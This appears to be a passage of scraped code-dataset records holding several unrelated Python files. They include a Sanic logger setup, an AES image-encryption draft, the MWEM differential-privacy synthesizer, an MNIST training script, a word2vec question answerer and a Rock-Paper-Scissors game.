loop=loop,minsize=1,maxsize=3)\n \n \n app.api_logger = logging.getLogger('magic')\n if (len(app.api_logger.handlers) == 0):\n _tmp_folder = \"/tmp/\"\n LOG_BASE_NAME = \"magic\"\n LOG_SUFIX = '.log'\n LOG_FORMAT = '%(asctime)-15s %(levelname)s [%(username)s %(ip)s] - %(message)s'\n formatter = logging.Formatter(LOG_FORMAT)\n #main log\n app.api_logger.setLevel(logging.DEBUG)\n log_file_handler = handlers.TimedRotatingFileHandler(LOG_BASE_NAME+LOG_SUFIX, when='D', interval=1, backupCount=365, encoding='UTF-8', delay=False, utc=True)\n log_file_handler.setFormatter(formatter)\n app.api_logger.addHandler(log_file_handler)\n \n try:\n app.api_logger.info(\"start running %r %s at %s\",app,socket.gethostname(),datetime.now(),extra={'username': 'sanic','ip': socket.gethostbyname(socket.gethostname())})\n except:\n #log rotate\n app.api_logger.info(\"start running %r %s at %s\",app,socket.gethostname(),datetime.now(),extra={'username': 'sanic','ip': socket.gethostbyname(socket.gethostname())})\n\n\n\nasync def requests_async(url,data,params,headers,libexec=requests.get):\n \n params_data = dict(url=url,json=data,params=params,headers=headers)\n futures = [\n loop.run_in_executor(\n None, \n lambda: libexec(**params_data), \n )\n ]\n response_req = await asyncio.gather(*futures)\n \n return response_req[0]\n\n","sub_path":"desafio/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"149554389","text":"import paralleldots\r\nName = 'Gokul'\r\n\r\napi_key = '' #DO NOT PUBLISH KEY!\r\n\r\nparalleldots.set_api_key(api_key)\r\n\r\nFile_Name = 'test.py'\r\nFile_object = open(File_Name, \"a\")\r\nread_Object = File_object.read\r\n\r\n\r\ndef sentimentVal(receivedMessage):\r\n results = paralleldots.sentiment(read_Object, \"en\")\r\n output = 0\r\n for sense, num in results['sentiment'].items():\r\n if num > output:\r\n output = num\r\n emotion = sense\r\n return emotion\r\n\r\ndef messageSent(receivedMessage, emotion, Name):\r\n if emotion == 'positive' or emotion == 'neutral':\r\n message = Name + \" is safe. They said: \" + message + \". - Mr.Gency Bot\"\r\n else:\r\n message = Name + \" may be in trouble. They said: \" + message + \". If \\\r\n they are in trouble, please contact them or someone who may \\\r\n be able to help. - Mr.Gency Bot\"\r\n return message\r\n \r\n\r\n\r\n\r\n \r\n \r\nprint(messageSent(sentimentVal(read_Object), Name))\r\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"277937463","text":"from MSB_LSB import decimalToBinary, binaryToDecimal\nfrom Crypto.Util.Padding import pad, unpad\nfrom Crypto.Random import get_random_bytes\nfrom bitstring import BitArray\nfrom Crypto.Cipher import AES\nfrom PIL import Image\nimport numpy as np\nimport random\nimport pickle\n\nimport math\nimport io\n\ndef create_image(bits):\n # Find the total items\n count = 0\n for i in bits:\n count = count + 1\n \n # Convert binary to decimal \n pixels = []\n for item in bits:\n bit = binaryToDecimal(item)\n pixels.append(bit)\n \n # Reshape to 2D array\n pixels = np.array(pixels)\n pixels = pixels.reshape(int(math.sqrt(count)), int(math.sqrt(count)))\n \n # Create the AES encypted image\n img = Image.fromarray(np.uint8(pixels * 255) , 'L')\n size = int(math.sqrt(count)), int(math.sqrt(count))\n img = img.resize(size)\n \n return img\n\ndef image_aes_ofb(image_path):\n \n # Load pixels from image\n im = Image.open(image_path)\n px = im.load()\n \n # Get the height and width from the original image\n height = im.height\n width = im.width\n \n # AES_CBC encryption\n key = b'\\xfa\\xde8\\t\\xda\\xc0\\x9f\\xf9E%\\xee\\xb5P\\xe6\\x9b\\xc7'\n IV = b'\\xbe\\xad\\x17\\x19\\t\\x98`;\\xd5\\x1c\\xc9H\\xd3[\\xc2g'\n \n ciphertext = []\n for i in range(0,height):\n for j in range(0,width):\n bi = decimalToBinary(px[i,j])\n MSB = bi[:4]\n LSB = bi[4:]\n \n modify_pixel = LSB + MSB\n modify_pixel = bytes(modify_pixel, 'utf-8')\n \n cipher = AES.new(key, AES.MODE_OFB, IV)\n cipher_text = cipher.encrypt(pad(modify_pixel, 16)) \n ciphertext.append(cipher_text)\n \n # Use pickle to write the list\n with open('Di1.pickle', 'wb') as pickle_out:\n pickle.dump(ciphertext, pickle_out)\n \n print(\"Written done!\")\n \n return key, IV\n\ndef image_aes_decrypted(image_path, key, IV):\n\n # Load the data from the pickle file\n with open('Di1.pickle', 'rb') as List:\n List = pickle.load(List)\n \n PlainText = []\n for item in List:\n decipher = AES.new(key, AES.MODE_OFB, IV)\n pt = unpad(decipher.decrypt(item), 16)\n PlainText.append(pt)\n print(PlainText)\n \n img = create_image(PlainText)\n img = img.rotate(-90)\n img.save(\"yeah.png\")\n \n \n \nif __name__ == '__main__':\n key, IV= image_aes_ofb('/Users/home/github/Cypto/Reversible_Data_Hiding/pre_processed_img.png')\n # img.save('draft.png')\n \n \n image_aes_decrypted('/Users/home/github/Cypto/Reversible_Data_Hiding/draft.png', key, IV)\n ","sub_path":"Drafts/draft_pickle.py","file_name":"draft_pickle.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"270530495","text":"import os\nimport pandas as pd\n\nfrom .dfs import DfsModelResult\nfrom .pandas import DataFramePointModelResult, DataFrameTrackModelResult\nfrom .xarray import XArrayModelResult\n\n\nclass ModelResult:\n \"\"\"\n ModelResult factory returning a specialized ModelResult object\n depending on the input.\n\n * dfs0 or dfsu file\n * pandas.DataFrame/Series\n * NetCDF/Grib: Under development!\n\n Note\n ----\n If an input has more than one item and the desired item is not\n specified as argument on construction, then the item of the\n modelresult 'mr' **must** be specified by e.g. mr[0] or mr['item_B']\n before connecting to an observation.\n\n Examples\n --------\n >>> mr = ModelResult(\"Oresund2D.dfsu\")\n >>> mr_item = mr[\"Surface elevation\"]\n >>> mr = ModelResult(\"Oresund2D_points.dfs0\", name=\"Oresund\")\n >>> mr_item = mr[0]\n >>> mr_item = ModelResult(\"Oresund2D.dfsu\", item=0)\n >>> mr_item = ModelResult(\"Oresund2D.dfsu\", item=\"Surface elevation\")\n\n >>> mr = ModelResult(df)\n >>> mr = mr[\"Water Level\"]\n >>> mr_item = ModelResult(df, item=\"Water Level\")\n \"\"\"\n\n def __new__(self, input, *args, **kwargs):\n import xarray as xr\n\n if isinstance(input, str):\n filename = input\n ext = os.path.splitext(filename)[-1]\n if \"dfs\" in ext:\n mr = DfsModelResult(filename, *args, **kwargs)\n return self._mr_or_mr_item(mr)\n else:\n mr = XArrayModelResult(filename, *args, **kwargs)\n return self._mr_or_mr_item(mr)\n\n elif isinstance(input, (pd.DataFrame, pd.Series)):\n type = kwargs.pop(\"type\", \"point\")\n if type == \"point\":\n mr = DataFramePointModelResult(input, *args, **kwargs)\n elif type == \"track\":\n mr = DataFrameTrackModelResult(input, *args, **kwargs)\n else:\n raise ValueError(f\"type '{type}' unknown (point, track)\")\n return self._mr_or_mr_item(mr)\n elif isinstance(input, (xr.Dataset, xr.DataArray)):\n mr = XArrayModelResult(input, *args, **kwargs)\n return self._mr_or_mr_item(mr)\n else:\n raise ValueError(\"Input type not supported (filename or DataFrame)\")\n\n @staticmethod\n def _mr_or_mr_item(mr):\n if mr._selected_item is not None:\n return mr[mr._selected_item]\n else:\n return mr\n","sub_path":"fmskill/model/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"442649291","text":"import numpy as np\nimport pandas as pd\nfrom scipy import linalg\nfrom nltk.corpus import stopwords\nimport argparse\nfrom ipyth_utils import tokenize\nimport codecs\nimport time\n\n\n## return word2vec(word)\ndef getword2vecval (N,w,word2vec):\n i = 0\n resh_w2v = []\n while resh_w2v ==[] and i<8:\n resh_w2v = list(word2vec[w.lower()])\n i = i+1\n\n #print (resh_w2v)\n if resh_w2v == []:\n resh_w2v = np.zeros(N, dtype=float)\n print (w)\n resh_w2v = np.array(resh_w2v)\n return resh_w2v\n\n\ndef evaluate_score (y_model, y_real):\n model_score = sum(y_model==y_real)/len(y_real)\n return model_score\n \n\n##\n## N - dimensionality of word2vec \n##\ndef predict_cosine_answers(data, word2vec, N, ngram):\n\n stop = stopwords.words('english')\n\n pred_answs = []\n pred_probs = [[\"A\", \"B\", \"C\", \"D\"]]\n for i in range(data.shape[0]):\n #calculate word2vec for question\n q_vec = np.zeros(N, dtype=float)\n for w in tokenize(data['question'][i], ngram):\n if w.lower() in word2vec and w.lower() not in stop:\n w2 = getword2vecval (N,w.lower(),word2vec)\n q_vec = np.add(q_vec, w2)\n q_vec = q_vec / linalg.norm(q_vec)\n \n #calculate word2vec for answers\n A_vec = np.zeros(N, dtype=float)\n B_vec = np.zeros(N, dtype=float)\n C_vec = np.zeros(N, dtype=float)\n D_vec = np.zeros(N, dtype=float)\n for w in tokenize(data['answerA'][i], ngram):\n if w.lower() in word2vec and w.lower() not in stop:\n w2 = getword2vecval (N,w.lower(),word2vec)\n #print (w2[0:4])\n A_vec = np.add(A_vec,w2)\n \n for w in tokenize(data['answerB'][i], ngram):\n if w.lower() in word2vec and w.lower() not in stop:\n w2 = getword2vecval (N,w.lower(),word2vec)\n #print (w2[0:4])\n B_vec = np.add(B_vec,w2)\n \n for w in tokenize(data['answerC'][i], ngram):\n if w.lower() in word2vec and w.lower() not in stop:\n w2 = getword2vecval (N,w.lower(),word2vec)\n #print (w2[0:4])\n C_vec = np.add(C_vec,w2)\n\n \n for w in tokenize(data['answerD'][i], ngram):\n if w.lower() in word2vec and w.lower() not in stop:\n w2 = getword2vecval (N,w.lower(),word2vec)\n #print (w2[0:4])\n D_vec = np.add(D_vec,w2)\n \n A_vec = A_vec / linalg.norm(A_vec) \n B_vec = B_vec / linalg.norm(B_vec)\n C_vec = C_vec / linalg.norm(C_vec)\n D_vec = D_vec / linalg.norm(D_vec)\n \n #choose question based on cosine distance\n idx = np.concatenate((A_vec, B_vec, C_vec, D_vec)).reshape(4, N).dot(q_vec).argmax()\n probs = np.concatenate((A_vec, B_vec, C_vec, D_vec)).reshape(4, N).dot(q_vec)\n pred_answs.append([\"A\", \"B\", \"C\", \"D\"][idx])\n pred_probs.append(probs)\n \n return pred_answs, pred_probs\n","sub_path":"Ipython/utils/ipyth_word2_vec.py","file_name":"ipyth_word2_vec.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"44190999","text":"import math\nimport random\nimport warnings\n\nimport numpy as np\nimport pandas as pd\n\nfrom opendp.smartnoise.synthesizers.base import SDGYMBaseSynthesizer\n\n\nclass MWEMSynthesizer(SDGYMBaseSynthesizer):\n \"\"\"\n N-Dimensional numpy implementation of MWEM.\n (http://users.cms.caltech.edu/~katrina/papers/mwem-nips.pdf)\n\n From the paper:\n \"[MWEM is] a broadly applicable, simple, and easy-to-implement algorithm, capable of\n substantially improving the performance of linear queries on many realistic datasets...\n (circa 2012)...MWEM matches the best known and nearly\n optimal theoretical accuracy guarantees for differentially private\n data analysis with linear queries.\"\n\n Linear queries used for sampling in this implementation are\n random contiguous slices of the n-dimensional numpy array.\n \"\"\"\n\n def __init__(\n self,\n q_count=400,\n epsilon=3.0,\n iterations=30,\n mult_weights_iterations=20,\n splits=[],\n split_factor=None,\n max_bin_count=500,\n custom_bin_count={},\n ):\n self.q_count = q_count\n self.epsilon = epsilon\n self.iterations = iterations\n self.mult_weights_iterations = mult_weights_iterations\n self.synthetic_data = None\n self.data_bins = None\n self.real_data = None\n self.splits = splits\n self.split_factor = split_factor\n self.max_bin_count = max_bin_count\n self.mins_maxes = {}\n self.scale = {}\n self.custom_bin_count = custom_bin_count\n\n # Pandas check\n self.pandas = False\n self.pd_cols = None\n self.pd_index = None\n\n # Query trackers\n self.q_values = None\n self.max_retries_exp_mechanism = 50\n\n def fit(self, data, categorical_columns=None, ordinal_columns=None):\n \"\"\"\n Creates a synthetic histogram distribution, based on the original data.\n Follows sdgym schema to be compatible with their benchmark system.\n :param data: Dataset to use as basis for synthetic data\n :type data: np.ndarray\n :return: synthetic data, real data histograms\n :rtype: np.ndarray\n \"\"\"\n if isinstance(data, np.ndarray):\n self.data = data.copy()\n elif isinstance(data, pd.DataFrame):\n self.pandas = True\n for col in data.columns:\n data[col] = pd.to_numeric(data[col], errors=\"ignore\")\n self.data = data.to_numpy().copy()\n self.pd_cols = data.columns\n self.pd_index = data.index\n else:\n raise ValueError(\"Data must be a numpy array or pandas dataframe.\")\n if self.split_factor is not None and self.splits == []:\n self.splits = self._generate_splits(data.T.shape[0], self.split_factor)\n self.splits = np.array(self.splits)\n if self.splits.size == 0:\n self.histograms = self._histogram_from_data_attributes(\n self.data, [np.arange(self.data.shape[1])]\n )\n else:\n self.histograms = self._histogram_from_data_attributes(self.data, self.splits)\n self.q_values = []\n for h in self.histograms:\n # h[1] is dimensions for each histogram\n self.q_values.append(self._compose_arbitrary_slices(self.q_count, h[1]))\n # Run the algorithm\n self.synthetic_histograms = self.mwem()\n\n def sample(self, samples):\n \"\"\"\n Creates samples from the histogram data.\n Follows sdgym schema to be compatible with their benchmark system.\n NOTE: We are sampleing from each split dimensional\n group as though they are *independent* from one another.\n We have essentially created len(splits) DP histograms as\n if they are separate databases, and combine the results into\n a single sample.\n :param samples: Number of samples to generate\n :type samples: int\n :return: N samples\n :rtype: list(np.ndarray)\n \"\"\"\n synthesized_columns = ()\n first = True\n for fake, _, split in self.synthetic_histograms:\n s = []\n fake_indices = np.arange(len(np.ravel(fake)))\n fake_distribution = np.ravel(fake)\n norm = np.sum(fake)\n for _ in range(samples):\n s.append(np.random.choice(fake_indices, p=(fake_distribution / norm)))\n s_unraveled = []\n for ind in s:\n s_unraveled.append(np.unravel_index(ind, fake.shape))\n # Here we make scale adjustments to match the original\n # data\n np_unraveled = np.array(s_unraveled)\n for i in range(np_unraveled.shape[-1]):\n min_c, max_c = self.mins_maxes[str(split[i])]\n # TODO: Deal with the 0 edge case when scaling\n # i.e. scale factor * 0th bin is 0,\n # but should still scale appropriately\n np_unraveled[:, i] = np_unraveled[:, i] * self.scale[str(split[i])]\n np_unraveled[:, i] = np_unraveled[:, i] + min_c\n if first:\n synthesized_columns = np_unraveled\n first = False\n else:\n synthesized_columns = np.hstack((synthesized_columns, np_unraveled))\n # Recombine the independent distributions into a single dataset\n combined = synthesized_columns\n # Reorder the columns to mirror their original order\n r = self._reorder(self.splits)\n if self.pandas:\n df = pd.DataFrame(combined[:, r], index=self.pd_index, columns=self.pd_cols)\n return df\n else:\n return combined[:, r]\n\n def mwem(self):\n \"\"\"\n Runner for the mwem algorithm.\n Initializes the synthetic histogram, and updates it\n for self.iterations using the exponential mechanism and\n multiplicative weights. Draws from the initialized query store\n for measurements.\n :return: synth_hist, self.histogram - synth_hist is the synthetic data histogram,\n self.histogram is original histo\n :rtype: np.ndarray, np.ndarray\n \"\"\"\n a_values = []\n for i, h in enumerate(self.histograms):\n hist = h[0]\n dimensions = h[1]\n split = h[3]\n queries = self.q_values[i]\n synth_hist = self._initialize_a(hist, dimensions)\n measurements = {}\n # NOTE: Here we perform a privacy check,\n # because if the histogram dimensions are\n # greater than the iterations, this can be\n # a big privacy risk (the sample queries will\n # otherwise be able to match the actual\n # distribution)\n # This usually occurs with a split factor of 1,\n # so that each attribute is independent of the other\n flat_dim = 1\n for j in dimensions:\n flat_dim *= j\n if 2 * flat_dim <= self.iterations:\n warnings.warn(\n \"Flattened dimensionality of synthetic histogram is less than\"\n + \" the number of iterations. This is a privacy risk.\"\n + \" Consider increasing your split_factor (especially if it is 1), \"\n + \"or decreasing the number of iterations. \"\n + \"Dim: \" + str(flat_dim) + \" Split: \" + str(split),\n Warning,\n )\n\n for i in range(self.iterations):\n # print(\"Iteration: \" + str(i))\n qi = self._exponential_mechanism(\n hist, synth_hist, queries, ((self.epsilon / (2 * self.iterations)) / len(self.histograms))\n )\n # Make sure we get a different query to measure:\n while qi in measurements:\n qi = self._exponential_mechanism(\n hist, synth_hist, queries, ((self.epsilon / (2 * self.iterations)) / len(self.histograms))\n )\n # NOTE: Add laplace noise here with budget\n evals = self._evaluate(queries[qi], hist)\n lap = self._laplace(\n (2 * self.iterations * len(self.histograms)) / (self.epsilon * len(dimensions))\n )\n measurements[qi] = evals + lap\n # Improve approximation with Multiplicative Weights\n synth_hist = self._multiplicative_weights(\n synth_hist, queries, measurements, hist, self.mult_weights_iterations\n )\n a_values.append((synth_hist, hist, split))\n return a_values\n\n def _initialize_a(self, histogram, dimensions):\n \"\"\"\n Initializes a uniform distribution histogram from\n the given histogram with dimensions\n :param histogram: Reference histogram\n :type histogram: np.ndarray\n :param dimensions: Reference dimensions\n :type dimensions: np.ndarray\n :return: New histogram, uniformly distributed according to\n reference histogram\n :rtype: np.ndarray\n \"\"\"\n # NOTE: Could actually use a distribution from real data with some budget,\n # as opposed to using this uniform dist (would take epsilon as argument,\n # and detract from it)\n n = np.sum(histogram)\n value = n / np.prod(dimensions)\n synth_hist = np.zeros_like(histogram)\n synth_hist += value\n return synth_hist\n\n def _histogram_from_data_attributes(self, data, splits=[]):\n \"\"\"\n Create a histogram from given data\n :param data: Reference histogram\n :type data: np.ndarray\n :return: Histogram over given data, dimensions,\n bins created (output of np.histogramdd)\n :rtype: np.ndarray, np.shape, np.ndarray\n \"\"\"\n histograms = []\n for split in splits:\n split_data = data[:, split]\n mins_data = []\n maxs_data = []\n dims_sizes = []\n # Transpose for column wise iteration\n for i, column in enumerate(split_data.T):\n min_c = min(column)\n max_c = max(column)\n # TODO: Make these noisy min/max\n mins_data.append(min_c)\n maxs_data.append(max_c)\n # Dimension size (number of bins)\n bin_count = int(max_c - min_c + 1)\n # Here we track the min and max for the column,\n # for sampling\n self.mins_maxes[str(split[i])] = (min_c, max_c)\n if bin_count > self.max_bin_count:\n # Note the limitations of MWEM here, specifically in the case of continuous data.\n warnings.warn(\n \"Bin count \"\n + str(bin_count)\n + \" in column: \"\n + str(split[i])\n + \" exceeds max_bin_count, defaulting to: \"\n + str(self.max_bin_count)\n + \". Is this a continuous variable?\",\n Warning,\n )\n bin_count = self.max_bin_count\n # We track a scaling factor per column, for sampling\n self.scale[str(split[i])] = (max_c - min_c + 1) / self.max_bin_count\n else:\n self.scale[str(split[i])] = 1\n if str(split[i]) in self.custom_bin_count:\n bin_count = int(self.custom_bin_count[str(split[i])])\n self.scale[str(split[i])] = 1\n dims_sizes.append(bin_count)\n # Produce an N,D dimensional histogram, where\n # we pre-specify the bin sizes to correspond with\n # our ranges above\n histogram, bins = np.histogramdd(split_data, bins=dims_sizes)\n # Return histogram, dimensions\n histograms.append((histogram, dims_sizes, bins, split))\n return histograms\n\n def _exponential_mechanism(self, hist, synth_hist, queries, eps):\n \"\"\"\n Refer to paper for in depth description of\n Exponential Mechanism.\n Parametrized with epsilon value epsilon/(2 * iterations)\n :param hist: Basis histogram\n :type hist: np.ndarray\n :param synth_hist: Synthetic histogram\n :type synth_hist: np.ndarray\n :param queries: Queries to draw from\n :type queries: list\n :param eps: Budget\n :type eps: float\n :return: # of errors\n :rtype: int\n \"\"\"\n errors = [\n abs(self._evaluate(queries[i], hist) - self._evaluate(queries[i], synth_hist)) * (eps / 2.0)\n for i in range(len(queries))\n ]\n maxi = max(errors)\n errors = [math.exp(errors[i] - maxi) for i in range(len(errors))]\n r = random.random()\n e_s = sum(errors)\n c = 0\n for i in range(len(errors)):\n c += errors[i]\n if c > r * e_s:\n return i\n return len(errors) - 1\n\n def _multiplicative_weights(self, synth_hist, queries, m, hist, iterate):\n \"\"\"\n Multiplicative weights update algorithm,\n used to boost the synthetic data accuracy given measurements m.\n Run for iterate times\n\n :param synth_hist: Synthetic histogram\n :type synth_hist: np.ndarray\n :param queries: Queries to draw from\n :type queries: list\n :param m: Measurements taken from real data for each qi query\n :type m: dict\n :param hist: Basis histogram\n :type hist: np.ndarray\n :param iterate: Number of iterations to run mult weights\n :type iterate: iterate\n :return: synth_hist\n :rtype: np.ndarray\n \"\"\"\n sum_a = np.sum(synth_hist)\n for _ in range(iterate):\n for qi in m:\n error = m[qi] - self._evaluate(queries[qi], synth_hist)\n # Perform the weights update\n query_update = self._binary_replace_in_place_slice(\n np.zeros_like(synth_hist.copy()), queries[qi])\n\n # Apply the update\n a_multiplier = np.exp(query_update * error / (2.0 * sum_a))\n a_multiplier[a_multiplier == 0.0] = 1.0\n synth_hist = synth_hist * a_multiplier\n # Normalize again\n count_a = np.sum(synth_hist)\n synth_hist = synth_hist * (sum_a / count_a)\n return synth_hist\n\n def _compose_arbitrary_slices(self, num_s, dimensions):\n \"\"\"\n Here, dimensions is the shape of the histogram\n We want to return a list of length num_s, containing\n random slice objects, given the dimensions\n These are our linear queries\n :param num_s: Number of queries (slices) to generate\n :type num_s: int\n :param dimensions: Dimensions of histogram to be sliced\n :type dimensions: np.shape\n :return: Collection of random np.s_ (linear queries) for\n a dataset with dimensions\n :rtype: list\n \"\"\"\n slices_list = []\n # TODO: For analysis, generate a distribution of slice sizes,\n # by running the list of slices on a dimensional array\n # and plotting the bucket size\n slices_list = []\n for _ in range(num_s):\n inds = []\n for _, s in np.ndenumerate(dimensions):\n # Random linear sample, within dimensions\n a = np.random.randint(s)\n b = np.random.randint(s)\n l_b = min(a, b)\n u_b = max(a, b) + 1\n pre = []\n pre.append(l_b)\n pre.append(u_b)\n inds.append(pre)\n # Compose slices\n sl = []\n for ind in inds:\n sl.append(np.s_[ind[0]: ind[1]])\n slices_list.append(sl)\n return slices_list\n\n def _evaluate(self, a_slice, data):\n \"\"\"\n Evaluate a count query i.e. an arbitrary slice\n :param a_slice: Random slice within bounds of flattened data length\n :type a_slice: np.s_\n :param data: Data to evaluate from (synthetic dset)\n :type data: np.ndarray\n :return: Count from data within slice\n :rtype: float\n \"\"\"\n # We want to count the number of objects in an\n # arbitrary slice of our collection\n # We use np.s_[arbitrary slice] as our queries\n e = data.T[tuple(a_slice)]\n\n if isinstance(e, np.ndarray):\n return np.sum(e)\n else:\n return e\n\n def _binary_replace_in_place_slice(self, data, a_slice):\n \"\"\"\n We want to create a binary copy of the data,\n so that we can easily perform our error multiplication\n in MW. Convenience function.\n :param data: Data\n :type data: np.ndarray\n :param a_slice: Slice\n :type a_slice: np.s_\n :return: Return data, where the range specified\n by a_slice is all 1s.\n :rtype: np.ndarray\n \"\"\"\n view = data.copy()\n view.T[tuple(a_slice)] = 1.0\n return view\n\n def _reorder(self, splits):\n \"\"\"\n Given an array of dimensionality splits (column indices)\n returns the corresponding reorder array (indices to return\n columns to original order)\n Example:\n original = [[1, 2, 3, 4, 5, 6],\n [ 6, 7, 8, 9, 10, 11]]\n\n splits = [[1,3,4],[0,2,5]]\n\n mod_data = [[2 4 5 1 3 6]\n [ 7 9 10 6 8 11]]\n\n reorder = [3 0 4 1 2 5]\n :param splits: 2d list with splits (column indices)\n :type splits: array of arrays\n :return: 2d list with splits (column indices)\n :rtype: array of arrays\n \"\"\"\n flat = np.concatenate(np.asarray(splits)).ravel()\n reordered = np.zeros(len(flat))\n for i, ind in enumerate(flat):\n reordered[ind] = i\n return reordered.astype(int)\n\n def _generate_splits(self, n_dim, factor):\n \"\"\"\n If user specifies, do the work and figure out how to divide the dimensions\n into even splits to speed up MWEM\n Last split will contain leftovers <= sizeof(factor)\n :param n_dim: Total # of dimensions\n :type n_dim: int\n :param factor: Desired size of the splits\n :type factor: int\n :return: Splits\n :rtype: np.array(np.array(),...)\n \"\"\"\n # Columns indices\n indices = np.arange(n_dim)\n\n # Split intelligently\n fits = int((np.floor(len(indices) / factor)) * factor)\n even_inds = indices[:fits].reshape((int(len(indices) / factor), factor))\n s1 = even_inds.tolist()\n if indices[fits:] != np.array([]):\n s1.append(indices[fits:])\n s2 = [np.array(l_val) for l_val in s1]\n return np.array(s2)\n\n def _laplace(self, sigma):\n \"\"\"\n Laplace mechanism\n :param sigma: Laplace scale param sigma\n :type sigma: float\n :return: Random value from laplace distribution [-1,1]\n :rtype: float\n \"\"\"\n return sigma * np.log(random.random()) * np.random.choice([-1, 1])\n","sub_path":"sdk/opendp/smartnoise/synthesizers/mwem.py","file_name":"mwem.py","file_ext":"py","file_size_in_byte":19323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"591623760","text":"\"\"\"\nTrains a single MNIST convnet to minimize cross entropy, periodically reporting\nits accuracy and the time spent training it.\n\"\"\"\n\nimport datetime\nimport tensorflow as tf\nfrom mnist import ConvNet, MNIST_TRAIN_SIZE, MNIST_TEST_SIZE, MNIST_TEST_BATCH_SIZE,\\\n get_mnist_data, set_mnist_data\nfrom tensorflow.models.official.mnist.dataset import train, test\n\n\nif __name__ == '__main__':\n set_mnist_data(train('MNIST_data/'), test('MNIST_data/'))\n train_data, test_data = get_mnist_data()\n train_next = train_data.shuffle(MNIST_TRAIN_SIZE).batch(50).repeat().make_one_shot_iterator().get_next()\n test_iterator = test_data.batch(MNIST_TEST_BATCH_SIZE).make_initializable_iterator()\n test_next = test_iterator.get_next()\n\n sess = tf.Session()\n\n x = tf.placeholder(tf.float32, [None, 784])\n y_ = tf.placeholder(tf.int32, [None])\n one_hot_y_ = tf.one_hot(y_, 10)\n keep_prob = tf.placeholder(tf.float32)\n\n net = ConvNet(sess, x, one_hot_y_, keep_prob)\n cross_entropy = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits_v2(labels=one_hot_y_, logits=net.y))\n optimizer = tf.train.AdamOptimizer(1e-4)\n train_step = optimizer.minimize(cross_entropy)\n\n net.initialize_variables()\n sess.run([var.initializer for var in optimizer.variables()])\n\n training_start = None\n training_time = datetime.timedelta()\n\n def print_stats() -> None:\n \"\"\"\n Calculates and prints the net's total training time and accuracy.\n \"\"\"\n global training_start, training_time\n if training_start is not None:\n training_time += datetime.datetime.now() - training_start\n print('Training time:', str(training_time))\n sess.run(test_iterator.initializer)\n size_accuracy = 0\n try:\n while True:\n test_images, test_labels = sess.run(test_next)\n batch_size = test_images.shape[0]\n batch_accuracy = sess.run(net.accuracy, feed_dict={x: test_images,\n y_: test_labels,\n keep_prob: 1})\n size_accuracy += batch_size * batch_accuracy\n except tf.errors.OutOfRangeError:\n pass\n print('Accuracy: %a' % (size_accuracy / MNIST_TEST_SIZE))\n training_start = datetime.datetime.now()\n\n step_num = 0\n while step_num < 20000:\n if step_num % 100 == 0:\n print('Step', step_num)\n if step_num % 500 == 0:\n print_stats()\n train_images, train_labels = sess.run(train_next)\n sess.run(train_step, feed_dict={x: train_images, y_: train_labels, keep_prob: 1})\n step_num += 1\n print_stats()\n","sub_path":"mnist_single.py","file_name":"mnist_single.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"567326884","text":"#! /usr/bin/env python\nfrom random import randint, seed\nfrom sys import exit, version_info\n\n# Python 2 and 3 compatibility.\ninput = raw_input if version_info == 2 else input\n\n__version__ = '0.1'\n__author__ = 'JaINTP - Jai Brown'\n__maintainer__ = 'JaINTP - Jai Brown'\n__status__ = 'Development'\n\n\nclass RockPaperScissors(object):\n \"\"\"Basic class that handles a Rock, Paper, Scissors game.\"\"\"\n\n __slots__ = [\n '__choices'\n ]\n\n def __init__(self):\n \"\"\"Constructor.\n Initialises member variables.\n \"\"\"\n self.__choices = ['Rock', 'Paper', 'Scissors']\n\n def game_loop(self):\n \"\"\"Main method that handles the game logic.\"\"\"\n # Seed the random number generator.\n seed()\n\n # Enter main loop.\n while True:\n # Get user input.\n player_turn = self.get_input()\n # Get bot input.\n bot_turn = randint(0, 2)\n result = self.get_result(player_turn, bot_turn)\n\n # Output choices.\n print('You chose: {}\\nBot chose: {}'.format(\n self.__choices[player_turn],\n self.__choices[bot_turn]))\n\n # Check and declare results!\n if not result[0] and not result[1]:\n print('Tie!\\n')\n else:\n print('{} win{}!\\n'.format('Bot' if result[1] else 'You',\n 's' if result[1] else ''))\n\n @staticmethod\n def get_input():\n \"\"\" Retrieves the user's input with a menu style prompt.\n\n @rtype: int\n @return: The user's input, minus one.\n \"\"\"\n choice = None\n while True:\n try:\n print('Rock - 1\\nPaper - 2\\nScissors - 3\\nExit - 4')\n choice = int(input('Choice: '))\n\n if choice not in (1, 2, 3, 4):\n raise ValueError()\n else:\n break\n except (ValueError, SyntaxError):\n print('Invalid input!')\n\n if choice == 4:\n exit()\n return choice - 1\n\n def get_result(self, player_choice, bot_choice):\n \"\"\"Calculates the results of both the player's and the bot's turns.\n\n @type player_choice: int\n @param player_choice: The player's selection.\n\n @type bot_choice: int\n @param bot_choice: The bot's selection.\n\n @rtype: tuple\n @return: A tuple containing two booleans.\n Whether the player's turn won and whether the bot's turn won.\n \"\"\"\n # player_choice - 1 should equal the bot's choice to win.\n # Yes I know PEP8 says not to assign lambdas, but YOLO!\n algo = lambda a, b, c: c[b] == c[a - (1 if a == 0 else 1)]\n\n player_wins = algo(player_choice, bot_choice, self.__choices)\n bot_wins = algo(bot_choice, player_choice, self.__choices)\n\n return player_wins, bot_wins\n\n\nif __name__ == '__main__':\n game = RockPaperScissors()\n game.game_loop()\n","sub_path":"RockPaperScissors.py","file_name":"RockPaperScissors.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"616645777","text":"class Solution(object):\n\n def isValidSudoku(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: bool\n \"\"\"\n row = 